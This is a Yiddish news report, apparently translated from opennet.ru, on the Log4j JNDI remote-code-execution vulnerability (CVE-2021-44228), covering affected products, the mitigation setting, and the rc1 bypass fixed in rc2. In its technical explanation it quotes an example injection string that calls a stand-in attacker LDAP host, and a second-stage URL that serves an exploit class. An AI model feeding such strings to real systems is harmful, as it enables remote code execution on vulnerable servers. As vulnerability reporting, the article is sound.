ืืื Apache Log4j, ืึท ืคืึธืืงืก ืคืจืืืืืืขืจืง ืคึฟืึทืจ ืึธืจืืึทื ืืืืื ื ืืึธืืื ื ืืื Java ืึทืคึผืืึทืงืืืฉืึทื ื, ืึท ืงืจืืืืฉ ืืืึทืื ืขืจืึทืืืืืื ืืื ืืืืขื ืึทืคืืื ืึทื ืึทืืึทืื ืึทืจืืืืจืึทืจืืฉ ืงืึธื ืฆื ืืืื ืขืงืกืึทืงืืืืึทื ืืืขื ืึท ืกืคึผืขืฉืื ืคืึธืจืืึทืืืขื ืืืขืจื ืืื ืื "{jndi: URL}" ืคึฟืึธืจืืึทื ืืื ืืขืฉืจืืื ืฆื ืื ืงืืึธืฅ. ืื ืืึทืคืึทืื ืงืขื ืขื ืืืื ืืืจืืืขืงืึธืื ืืืืฃ ื'ืืื ืึทืคึผืืึทืงืืืฉืึทื ื ืืืึธืก ืงืืึธืฅ ืืืึทืืืขืก ืืืงืืืขื ืคืื ืคืื ืืจืืืกื ืืืง ืงืืืืื, ืืืฉื ืืืขื ืืืืึทืื ืืืง ืคึผืจืึธืืืขืืึทืืืง ืืืึทืืืขืก ืืื ืืขืืช ืึทืจืืืงืืขื.
ืขืก ืืื ืืืืขืจืงื ืึทื ืึผืืขื ืึทืืข ืคึผืจืึทืืืฉืขืงืก ื ืืฆื ืคืจืึทืืขืืืึธืจืงืก ืึทืืึท ืืื Apache Struts, Apache Solr, Apache Druid ืึธืืขืจ Apache Flink ืืขื ืขื ืึทืคืขืงืืึทื ืืืจื ืืขื ืคึผืจืึธืืืขื, ืึทืจืืึทื ืืขืจืขืื ื Steam, Apple iCloud, Minecraft ืงืืืืึทื ืฅ ืืื ืกืขืจืืืขืจืก. ืขืก ืืื ืืขืจืืืึทืจื ืึทื ืื ืืืึทืื ืขืจืึทืืืืืื ืงืขื ืคืืจื ืฆื ืึท ืืืืึทืืืข ืคืื โโืืึทืกืืื ืื ืคืืื ืืืืฃ ืคึฟืืจืืข ืึทืคึผืืึทืงืืืฉืึทื ื, ืจืืคึผืืืื ื ืื ืืขืฉืืืืข ืคืื โโืงืจืืืืฉ ืืืึทืื ืขืจืึทืืืืืืื ืืื ืื Apache Struts ืคืจืืืืืืขืจืง, ืืืึธืก, ืืืื ืึท ืคึผืจืึธืกื ืึธืคึผืฉืึทืฆืื ื, ืืื ืืขื ืืฆื ืืื ืืืขื ืึทืคึผืืึทืงืืืฉืึทื ื ืืืจื 65% ืคืื ืคืึธืจืืฉืื. 100 ืงืึธืืคึผืึทื ืืขืก ืึทืจืืึทื ืืขืจืขืื ื ืคืจืืืื ืฆื ืืืขืจืงืืงื ืื ื ืขืฅ ืคึฟืึทืจ ืฉืคึผืืจืขืืืืืง ืกืืกืืขืืขื.
ืืขืจ ืคึผืจืึธืืืขื ืืื ืคืึทืจืขืจืืขืจื ืืืจื ืื ืคืึทืงื ืึทื ืึท ืืจืืขืื ืขืงืกืคึผืืืื ืืื ืฉืืื ืืจืืืก, ืึธืืขืจ ืคืืงืกืื ืคึฟืึทืจ ืื ืกืืึทืืื ืฆืืืืืื ืืขื ืขื ื ืึธื ื ืืฉื ืฆืื ืืืคืืขืฉืืขืื. ืื CVE ืืืืขื ืืืคืืฆืืจื ืืื ื ืึธื ื ืืฉื ืึทืกืืื ื. ืืขืจ ืคืึทืจืจืืืื ืืื ืืืืื ืึทืจืืึทื ืืขืจืขืื ื ืืื ืื log4j-2.15.0-rc1 ืคึผืจืืืืจื ืฆืืืืึทื. ืืื ืึท ืืืึธืจืงืึทืจืึธืื ื ืคึฟืึทืจ ืืืึทืงืื ื ืื ืืืึทืื ืขืจืึทืืืืืื, ืขืก ืืื ืจืขืงืึทืืขื ืืื ืฆื ืฉืืขืื ืื log4j2.formatMsgNoLookups ืคึผืึทืจืึทืืขืืขืจ ืฆื ืืืช.
ืืขืจ ืคืจืืืืขื ืืื ืืขืืืขื ืืขืคึฟืืจื ืืืจื log4j'ืก ืฉืืืฆืข ืคึฟืึทืจ ืคึผืจืึทืกืขืกืื ื ืกืคึผืขืฆืืขืืข ืืึทืกืงืขืก "{}" ืืื ืืึธื ืฉืืจืืช, ืืืึธืก ืงืขื ืขื ืืขื ืืฆื ืืืขืจื ืฆื ืืืจืืคืืจื JNDI (Java Naming and Directory Interface) ืคึฟืจืึทืืขืก. ืื ืึทืืึทืงืข ืงืืื ืึทืจืึธืคึผ ืฆื ืืืจืืืขืื ืึท ืกืืจืื ื ืืื ืืขืจ ืกืึทืืกืืืืืฆืืข "${jndi:ldap://attacker.com/a}", ืืืึธืก, ืืืขื ืคึผืจืึทืกืขืกื, ืืืขื log4j ืฉืืงื ืกืขืจืืืขืจ attacker.com LDAP ืงืืืขืจื ืคืืจื ืืืฉืืืื ืงืืืก ืืืขื. ืฆืืจืืงืืขืืขืื ืกืขืจืืืขืจ ืืขืจ ืืืืงืืจืขืจ'ืก ืืืขื (ืืืฉื http://second-stage.attacker.com/Exploit.class) ืืืขื ืืืขืจื ืืขืืึธืื ืืื ืืืืกืืขืคืืจื ืืื ืืขื ืงืื ืืขืงืกื ืคืื ืืขื ืืืฆืืืงื ืคึผืจืึธืฆืขืก, ืืื ืืึธืก ืืืขื ืืขืจืืขืืืขืื ืืขื ืืืืงืืจืขืจ ืืืืกืฆืืคืืจื ืึทืจืืืืจืขืจื ืงืึธื ืืืืฃ ืืขืจ ืกืืกืืขื ืืื ืื ืคึผืจืืืืืืขืืืขืก ืคืื ืืขืจ ืืืฆืืืงืขืจ ืึทืคึผืืืงืึทืฆืืข.
ืึทืืขื ืืื 1: ืื ืืืึทืื ืขืจืึทืืืืืื ืืื ืึทืกืืื ื ืื ืืืขื ืืืคืืขืจ CVE-2021-44228.
ืึทืืขื ืืื 2: ื ืืืขื ืฆื ืืืืคึผืึทืก ืื ืฉืืฅ ืฆืืืขืืขืื ืืืจื ืืขืืืื ื log4j-2.15.0-rc1 ืืื ืืืืขื ืึทืคืืื. ื ื ืืึทืข ืืขืจืืืึทื ืืืงื, log4j-2.15.0-rc2, ืืื ืคืืจืืขืืืืื ืืื ืืขืจ ืคืืืฉืืขื ืืืง ืฉืืฅ ืงืขืื ืื ืืืึทืื ืขืจืึทืืืืืื. ืืขืจ ืงืึธื ืืืืืืืฅ ืื ืขื ืืขืจืื ื ืคึฟืึทืจืืื ืื ืืื ืืขืจ ืึทืืืขืง ืคืื ืึทื ืึทืื ืึธืจืืึทื ืืขืจืืึทื ืืืฉืึทื ืืื ืื ืคืึทื ืคืื ื ืืฆื ืึท ืื ืงืขืจืขืงืืื ืคืึธืจืืึทืืืขื JNDI URL.
ืืงืืจ: opennet.ru
